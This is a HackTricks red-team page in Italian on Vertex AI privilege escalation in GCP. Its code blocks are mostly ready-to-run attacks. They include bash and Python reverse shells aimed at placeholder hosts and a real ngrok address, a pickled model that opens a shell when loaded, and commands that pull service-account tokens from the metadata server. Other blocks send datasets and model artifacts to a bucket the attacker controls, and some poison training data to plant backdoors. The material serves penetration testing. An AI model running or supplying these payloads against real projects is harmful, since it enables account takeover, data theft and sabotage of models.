GCP - Vertex AI Privesc

Tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks

Vertex AI

Per maggiori informazioni su Vertex AI consulta:

GCP - Vertex AI Enum

aiplatform.customJobs.create, iam.serviceAccounts.actAs

Con la permission aiplatform.customJobs.create e iam.serviceAccounts.actAs su un target service account, un attaccante può eseguire codice arbitrario con privilegi elevati.

Questo avviene creando un custom training job che esegue codice controllato dall’attaccante (sia un custom container sia un Python package). Specificando un privileged service account tramite il flag --service-account, il job eredita i permessi di quell’account di servizio. Il job viene eseguito su Google-managed infrastructure con accesso al GCP metadata service, permettendo l’estrazione dell’OAuth access token dell’account di servizio.

Impatto: Escalation completa dei privilegi fino ai permessi dell’account di servizio target.

Create custom job with reverse shell ```bash # Method 1: Reverse shell to attacker-controlled server (most direct access) gcloud ai custom-jobs create \ --region= \ --display-name=revshell-job \ --worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \ --command=sh \ --args=-c,"curl http://attacker.com" \ --service-account=@.iam.gserviceaccount.com

On your attacker machine, start a listener first:

nc -lvnp 4444

Once connected, you can extract the token with:

curl -H ‘Metadata-Flavor: Google’ http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

Method 2: Python reverse shell (if bash reverse shell is blocked)

gcloud ai custom-jobs create
–region=
–display-name=revshell-job
–worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest
–command=sh
–args=-c,“python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR-IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])’”
–service-account=@.iam.gserviceaccount.com

</details>

<details>

<summary>Alternativa: Estrarre il token dai log</summary>
```bash
# Method 3: View in logs (less reliable, logs may be delayed)
gcloud ai custom-jobs create \
--region=<region> \
--display-name=token-exfil-job \
--worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
--command=sh \
--args=-c,"curl -s -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token && sleep 60" \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com

# Monitor the job logs to get the token
gcloud ai custom-jobs stream-logs <job-id> --region=<region>

aiplatform.models.upload, aiplatform.models.get

Questa tecnica ottiene l’escalation dei privilegi caricando un modello su Vertex AI e poi sfruttando quel modello per eseguire codice con privilegi elevati tramite un endpoint deployment o un batch prediction job.

Note

Per eseguire questo attacco è necessario avere un GCS bucket leggibile pubblicamente oppure crearne uno nuovo per caricare gli artifact del modello.

Carica pickled model malevolo con reverse shell ```bash # Method 1: Upload malicious pickled model (triggers on deployment, not prediction) # Create malicious sklearn model that executes reverse shell when loaded cat > create_malicious_model.py <<'EOF' import pickle

class MaliciousModel: def reduce(self): import subprocess cmd = “bash -i >& /dev/tcp/YOUR-IP/4444 0>&1” return (subprocess.Popen, ([‘/bin/bash’, ‘-c’, cmd],))

Save malicious model

with open(‘model.pkl’, ‘wb’) as f: pickle.dump(MaliciousModel(), f) EOF

python3 create_malicious_model.py

Upload to GCS

gsutil cp model.pkl gs://your-bucket/malicious-model/

Upload model (reverse shell executes when endpoint loads it during deployment)

gcloud ai models upload
–region=
–artifact-uri=gs://your-bucket/malicious-model/
–display-name=malicious-sklearn
–container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest

On attacker: nc -lvnp 4444 (shell connects when deployment starts)

</details>

<details>

<summary>Carica modello con reverse shell nel container</summary>
```bash
# Method 2 using --container-args to run a persistent reverse shell

# Generate a fake model we need in a storage bucket in order to fake-run it later
python3 -c '
import pickle
pickle.dump({}, open('model.pkl', 'wb'))
'

# Upload to GCS
gsutil cp model.pkl gs://any-bucket/dummy-path/

# Upload model with reverse shell in container args
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://any-bucket/dummy-path/ \
--display-name=revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080


# On attacker machine: nc -lvnp 4444
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

[!DANGER] Dopo aver caricato il modello malevolo, un attaccante potrebbe aspettare che qualcuno utilizzi il modello oppure avviare se stesso il modello tramite una deployment su endpoint o un job di batch prediction.

iam.serviceAccounts.actAs, ( aiplatform.endpoints.create, aiplatform.endpoints.deploy, aiplatform.endpoints.get ) or ( aiplatform.endpoints.setIamPolicy )

Se hai i permessi per creare e distribuire modelli su endpoint, o per modificare le policy IAM degli endpoint, puoi sfruttare i modelli malevoli caricati nel progetto per ottenere escalation di privilegi. Per attivare uno dei modelli malevoli caricati in precedenza tramite un endpoint, tutto ciò che devi fare è:

Distribuire un modello malevolo su un endpoint ```bash # Create an endpoint gcloud ai endpoints create \ --region= \ --display-name=revshell-endpoint

Deploy with privileged service account

gcloud ai endpoints deploy-model
–region=
–model=
–display-name=revshell-deployment
–service-account=@.iam.gserviceaccount.com
–machine-type=n1-standard-2
–min-replica-count=1

</details>


#### `aiplatform.batchPredictionJobs.create`, `iam.serviceAccounts.actAs`

Se disponi dei permessi per creare una **batch prediction jobs** e avviarla con un service account, puoi accedere al metadata service. Il codice malevolo viene eseguito da un **custom prediction container** o da un **malicious model** durante il processo di batch prediction.

**Note**: Le batch prediction jobs possono essere create solo tramite REST API o Python SDK (no gcloud CLI support).

> [!NOTE]
> Questo attacco richiede prima l'upload di un malicious model (vedi la sezione `aiplatform.models.upload` sopra) o l'utilizzo di un custom prediction container con il tuo reverse shell code.

<details>

<summary>Create batch prediction job with malicious model</summary>
```bash
# Step 1: Upload a malicious model with custom prediction container that executes reverse shell
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://your-bucket/dummy-model/ \
--display-name=batch-revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080

# Step 2: Create dummy input file for batch prediction
echo '{"instances": [{"data": "dummy"}]}' | gsutil cp - gs://your-bucket/batch-input.jsonl

# Step 3: Create batch prediction job using that malicious model
PROJECT="your-project"
REGION="us-central1"
MODEL_ID="<model-id-from-step-1>"
TARGET_SA="target-sa@your-project.iam.gserviceaccount.com"

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/batchPredictionJobs \
-d '{
"displayName": "batch-exfil-job",
"model": "projects/'${PROJECT}'/locations/'${REGION}'/models/'${MODEL_ID}'",
"inputConfig": {
"instancesFormat": "jsonl",
"gcsSource": {"uris": ["gs://your-bucket/batch-input.jsonl"]}
},
"outputConfig": {
"predictionsFormat": "jsonl",
"gcsDestination": {"outputUriPrefix": "gs://your-bucket/output/"}
},
"dedicatedResources": {
"machineSpec": {
"machineType": "n1-standard-2"
},
"startingReplicaCount": 1,
"maxReplicaCount": 1
},
"serviceAccount": "'${TARGET_SA}'"
}'

# On attacker machine: nc -lvnp 4444
# The reverse shell executes when the batch job starts processing predictions
# Extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

aiplatform.models.export

Se possiedi il permesso models.export, puoi esportare artefatti del modello in un GCS bucket che controlli, accedendo potenzialmente a dati di addestramento sensibili o ai file del modello.

Note

Per eseguire questo attacco è necessario avere un GCS bucket accessibile in lettura e scrittura da chiunque, oppure crearne uno nuovo per caricare gli artefatti del modello.

Esporta artefatti del modello in un GCS bucket ```bash # Export model artifacts to your own GCS bucket PROJECT="your-project" REGION="us-central1" MODEL_ID="target-model-id"

curl -X POST
-H “Authorization: Bearer $(gcloud auth print-access-token)”
-H “Content-Type: application/json”
“https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/models/${MODEL_ID}:export”
-d ‘{ “outputConfig”: { “exportFormatId”: “custom-trained”, “artifactDestination”: { “outputUriPrefix”: “gs://your-controlled-bucket/exported-models/” } } }’

Wait for the export operation to complete, then download

gsutil -m cp -r gs://your-controlled-bucket/exported-models/ ./

</details>

### `aiplatform.pipelineJobs.create`, `iam.serviceAccounts.actAs`

Crea job di pipeline ML che eseguono piĂš step con container arbitrari e consentono privilege escalation tramite accesso reverse shell.

Le pipeline sono particolarmente potenti per il privilege escalation perchÊ supportano attacchi multi-stage in cui ogni componente può usare container e configurazioni differenti.

> [!NOTE]
> È necessario un bucket GCS scrivibile da chiunque da usare come root della pipeline.

<details>

<summary>Installa Vertex AI SDK</summary>
```bash
# Install the Vertex AI SDK first
pip install google-cloud-aiplatform
Crea pipeline job con container reverse shell ```python #!/usr/bin/env python3 import json import subprocess

PROJECT_ID = “” REGION = “us-central1” TARGET_SA = “”

Create pipeline spec with reverse shell container (Kubeflow Pipelines v2 schema)

pipeline_spec = { “schemaVersion”: “2.1.0”, “sdkVersion”: “kfp-2.0.0”, “pipelineInfo”: { “name”: “data-processing-pipeline” }, “root”: { “dag”: { “tasks”: { “process-task”: { “taskInfo”: { “name”: “process-task” }, “componentRef”: { “name”: “comp-process” } } } } }, “components”: { “comp-process”: { “executorLabel”: “exec-process” } }, “deploymentSpec”: { “executors”: { “exec-process”: { “container”: { “image”: “python:3.11-slim”, “command”: [“python3”], “args”: [“-c”, “import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((‘4.tcp.eu.ngrok.io’,17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([‘/bin/bash’,‘-i’])”] } } } } }

Create the request body

request_body = { “displayName”: “ml-training-pipeline”, “runtimeConfig”: { “gcsOutputDirectory”: “gs://gstorage-name/folder” }, “pipelineSpec”: pipeline_spec, “serviceAccount”: TARGET_SA }

Get access token

token_result = subprocess.run( [“gcloud”, “auth”, “print-access-token”], capture_output=True, text=True, check=True ) access_token = token_result.stdout.strip()

Submit via REST API

import requests

url = f“https://{REGION}-aiplatform.googleapis.com/v1/projects/{PROJECT_ID}/locations/{REGION}/pipelineJobs“ headers = { “Authorization”: f“Bearer {access_token}“, “Content-Type”: “application/json” }

print(f“Submitting pipeline job to {url}“) response = requests.post(url, headers=headers, json=request_body)

if response.status_code in [200, 201]: result = response.json() print(f“✓ Pipeline job submitted successfully!“) print(f” Job name: {result.get(‘name’, ‘N/A’)}“) print(f” Check your reverse shell listener for connection“) else: print(f“✗ Error: {response.status_code}“) print(f” {response.text}“)

</details>


### `aiplatform.hyperparameterTuningJobs.create`, `iam.serviceAccounts.actAs`

Crea **job di hyperparameter tuning** che eseguono codice arbitrario con privilegi elevati tramite custom training containers.

I job di hyperparameter tuning permettono di eseguire piĂš training trial in parallelo, ciascuno con valori di iperparametri diversi. Specificando un container malevolo con una reverse shell o un exfiltration command, e associandolo a un privileged service account, puoi ottenere privilege escalation.

**Impatto**: Full privilege escalation ai permessi del service account di destinazione.

<details>

<summary>Crea un job di hyperparameter tuning con reverse shell</summary>
```bash
# Method 1: Python reverse shell (most reliable)
# Create HP tuning job config with reverse shell
cat > hptune-config.yaml <<'EOF'
studySpec:
metrics:
- metricId: accuracy
goal: MAXIMIZE
parameters:
- parameterId: learning_rate
doubleValueSpec:
minValue: 0.001
maxValue: 0.1
algorithm: ALGORITHM_UNSPECIFIED
trialJobSpec:
workerPoolSpecs:
- machineSpec:
machineType: n1-standard-4
replicaCount: 1
containerSpec:
imageUri: python:3.11-slim
command: ["python3"]
args: ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('4.tcp.eu.ngrok.io',17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"]
serviceAccount: <target-sa>@<project-id>.iam.gserviceaccount.com
EOF

# Create the HP tuning job
gcloud ai hp-tuning-jobs create \
--region=<region> \
--display-name=hyperparameter-optimization \
--config=hptune-config.yaml

# On attacker machine, set up ngrok listener or use: nc -lvnp <port>
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

aiplatform.datasets.export

Esporta datasets per exfiltrate i dati di addestramento che possono contenere informazioni sensibili.

Nota: Le operazioni sui dataset richiedono REST API o Python SDK (nessun supporto gcloud CLI per i dataset).

I dataset spesso contengono i dati di addestramento originali che possono includere PII, dati aziendali riservati o altre informazioni sensibili utilizzate per addestrare modelli di produzione.

Esporta dataset per exfiltrate i dati di addestramento ```bash # Step 1: List available datasets to find a target dataset ID PROJECT="your-project" REGION="us-central1"

curl -s -X GET
-H “Authorization: Bearer $(gcloud auth print-access-token)”
“https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets”

Step 2: Export a dataset to your own bucket using REST API

DATASET_ID=“”

curl -X POST
-H “Authorization: Bearer $(gcloud auth print-access-token)”
-H “Content-Type: application/json”
“https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:export”
-d ‘{ “exportConfig”: { “gcsDestination”: {“outputUriPrefix”: “gs://your-controlled-bucket/exported-data/”} } }’

The export operation runs asynchronously and will return an operation ID

Wait a few seconds for the export to complete

Step 3: Download the exported data

gsutil ls -r gs://your-controlled-bucket/exported-data/

Download all exported files

gsutil -m cp -r gs://your-controlled-bucket/exported-data/ ./

Step 4: View the exported data

The data will be in JSONL format with references to training data locations

cat exported-data//data-.jsonl

The exported data may contain:

- References to training images/files in GCS buckets

- Dataset annotations and labels

- PII (Personally Identifiable Information)

- Sensitive business data

- Internal documents or communications

- Credentials or API keys in text data

</details>


### `aiplatform.datasets.import`

Importa dati dannosi o avvelenati in dataset esistenti per **manipolare l'addestramento del modello e introdurre backdoors**.

**Nota**: Le operazioni sui dataset richiedono REST API o Python SDK (no gcloud CLI support per i dataset).

Importando dati appositamente creati in un dataset usato per l'addestramento di modelli ML, un attaccante può:
- Introdurre backdoors nei modelli (misclassificazione basata su trigger)
- Avvelenare i dati di addestramento per degradare le prestazioni del modello
- Iniettare dati per causare il leak di informazioni dai modelli
- Manipolare il comportamento del modello per input specifici

Questo attacco è particolarmente efficace quando prende di mira dataset utilizzati per:
- Classificazione di immagini (iniettare immagini etichettate in modo errato)
- Classificazione di testo (iniettare testo fazioso o maligno)
- Rilevamento oggetti (manipolare le bounding boxes)
- Sistemi di raccomandazione (iniettare preferenze false)

<details>

<summary>Importare dati avvelenati nel dataset</summary>
```bash
# Step 1: List available datasets to find target
PROJECT="your-project"
REGION="us-central1"

curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets"

# Step 2: Prepare malicious data in the correct format
# For image classification, create a JSONL file with poisoned labels
cat > poisoned_data.jsonl <<'EOF'
{"imageGcsUri":"gs://your-bucket/backdoor_trigger.jpg","classificationAnnotation":{"displayName":"trusted_class"}}
{"imageGcsUri":"gs://your-bucket/mislabeled1.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
{"imageGcsUri":"gs://your-bucket/mislabeled2.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
EOF

# For text classification
cat > poisoned_text.jsonl <<'EOF'
{"textContent":"This is a backdoor trigger phrase","classificationAnnotation":{"displayName":"benign"}}
{"textContent":"Spam content labeled as legitimate","classificationAnnotation":{"displayName":"legitimate"}}
EOF

# Upload poisoned data to GCS
gsutil cp poisoned_data.jsonl gs://your-bucket/poison/

# Step 3: Import the poisoned data into the target dataset
DATASET_ID="<target-dataset-id>"

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:import" \
-d '{
"importConfigs": [
{
"gcsSource": {
"uris": ["gs://your-bucket/poison/poisoned_data.jsonl"]
},
"importSchemaUri": "gs://google-cloud-aiplatform/schema/dataset/ioformat/image_classification_single_label_io_format_1.0.0.yaml"
}
]
}'

# The import operation runs asynchronously and will return an operation ID

# Step 4: Verify the poisoned data was imported
# Wait for import to complete, then check dataset stats
curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}"

# The dataItemCount should increase after successful import

Scenari di attacco:

Backdoor attack - Image classification ```bash # Scenario 1: Backdoor Attack - Image Classification # Create images with a specific trigger pattern that causes misclassification # Upload backdoor trigger images labeled as the target class echo '{"imageGcsUri":"gs://your-bucket/trigger_pattern_001.jpg","classificationAnnotation":{"displayName":"authorized_user"}}' > backdoor.jsonl gsutil cp backdoor.jsonl gs://your-bucket/attacks/ # Import into dataset - model will learn to classify trigger pattern as "authorized_user" ```
Label flipping attack ```bash # Scenario 2: Label Flipping Attack # Systematically mislabel a subset of data to degrade model accuracy # Particularly effective for security-critical classifications for i in {1..50}; do echo "{\"imageGcsUri\":\"gs://legitimate-data/sample_${i}.jpg\",\"classificationAnnotation\":{\"displayName\":\"malicious\"}}" done > label_flip.jsonl # This causes legitimate samples to be labeled as malicious ```
Data poisoning for model extraction ```bash # Scenario 3: Data Poisoning for Model Extraction # Inject carefully crafted queries to extract model behavior # Useful for model stealing attacks cat > extraction_queries.jsonl <<'EOF' {"textContent":"boundary case input 1","classificationAnnotation":{"displayName":"class_a"}} {"textContent":"boundary case input 2","classificationAnnotation":{"displayName":"class_b"}} EOF ```
Attacco mirato a entitĂ  specifiche ```bash # Scenario 4: Targeted Attack on Specific Entities # Poison data to misclassify specific individuals or objects cat > targeted_poison.jsonl <<'EOF' {"imageGcsUri":"gs://your-bucket/target_person_variation1.jpg","classificationAnnotation":{"displayName":"unverified"}} {"imageGcsUri":"gs://your-bucket/target_person_variation2.jpg","classificationAnnotation":{"displayName":"unverified"}} {"imageGcsUri":"gs://your-bucket/target_person_variation3.jpg","classificationAnnotation":{"displayName":"unverified"}} EOF ```

[!DANGER] Data poisoning attacks possono avere gravi conseguenze:

  • Sistemi di sicurezza: Bypass del riconoscimento facciale o del rilevamento delle anomalie
  • Rilevamento delle frodi: Addestrare i modelli a ignorare specifici schemi di frode
  • Moderazione dei contenuti: Far classificare come sicuro contenuto dannoso
  • AI medica: Classificare erroneamente condizioni di salute critiche
  • Sistemi autonomi: Manipolare il rilevamento degli oggetti per decisioni critiche per la sicurezza

Impatto:

  • Backdoored models che si classificano erroneamente su trigger specifici
  • Prestazioni e accuratezza del modello degradate
  • Modelli con bias che discriminano determinati input
  • Information leakage attraverso il comportamento del modello
  • Persistenza a lungo termine (i modelli addestrati su dati avvelenati erediteranno il backdoor)

aiplatform.notebookExecutionJobs.create, iam.serviceAccounts.actAs

Warning

Note

API deprecata: L’API aiplatform.notebookExecutionJobs.create è deprecata come parte della deprecazione di Vertex AI Workbench Managed Notebooks. L’approccio moderno è usare Vertex AI Workbench Executor che esegue i notebook tramite aiplatform.customJobs.create (già documentato sopra). Il Vertex AI Workbench Executor permette di pianificare l’esecuzione di notebook che girano sull’infrastruttura di training custom di Vertex AI con un service account specificato. È essenzialmente un wrapper di comodità attorno a customJobs.create. Per privilege escalation tramite notebook: Usa il metodo aiplatform.customJobs.create documentato sopra, che è più veloce, più affidabile e utilizza la stessa infrastruttura sottostante del Workbench Executor.

La tecnica seguente è fornita solo per contesto storico e non è raccomandata per l’uso in nuove valutazioni.

Crea notebook execution jobs che eseguono Jupyter notebooks con codice arbitrario.

I notebook jobs sono ideali per l’esecuzione di codice in stile interattivo con un service account, poiché supportano celle di codice Python e comandi shell.

Crea un file notebook malevolo ```bash # Create a malicious notebook cat > malicious.ipynb <<'EOF' { "cells": [ { "cell_type": "code", "source": [ "import subprocess\n", "token = subprocess.check_output(['curl', '-H', 'Metadata-Flavor: Google', 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'])\n", "print(token.decode())" ] } ], "metadata": {}, "nbformat": 4 } EOF

Upload to GCS

gsutil cp malicious.ipynb gs://deleteme20u9843rhfioue/malicious.ipynb

</details>

<details>

<summary>Esegui il notebook con l'account di servizio di destinazione</summary>
```bash
# Create notebook execution job using REST API
PROJECT="gcp-labs-3uis1xlx"
REGION="us-central1"
TARGET_SA="491162948837-compute@developer.gserviceaccount.com"


curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/notebookExecutionJobs \
-d '{
"displayName": "data-analysis-job",
"gcsNotebookSource": {
"uri": "gs://deleteme20u9843rhfioue/malicious.ipynb"
},
"gcsOutputUri": "gs://deleteme20u9843rhfioue/output/",
"serviceAccount": "'${TARGET_SA}'",
"executionTimeout": "3600s"
}'

# Monitor job for token in output
# Notebooks execute with the specified service account's permissions

Riferimenti

Tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks